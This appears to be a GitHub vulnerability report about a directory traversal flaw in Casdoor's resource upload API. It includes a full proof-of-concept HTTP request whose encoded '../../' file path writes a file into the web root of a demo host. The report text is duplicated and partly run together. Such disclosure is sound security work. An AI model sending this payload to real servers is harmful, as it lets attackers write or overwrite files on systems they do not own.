Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below:
POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1Host: door.casdoor.comCookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166aContent-Length: 192Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "macOS"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJMAccept: */*Origin: https://door.casdoor.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://door.casdoor.com/resourcesAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryUPAwhIoXMrbemuJMContent-Disposition: form-data; name="file"; filename="spider.png"Content-Type: image/pngI'm here.------WebKitFormBoundaryUPAwhIoXMrbemuJM--
Hi, I found a security issue, when the upload provider is Storage Local File System, the
fullFilePathparameter of the interface/api/upload-resourcewill have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below:Then we can find out that the problem does occur by following this link。

https://door.casdoor.com/flag.html
The text was updated successfully, but these errors were encountered: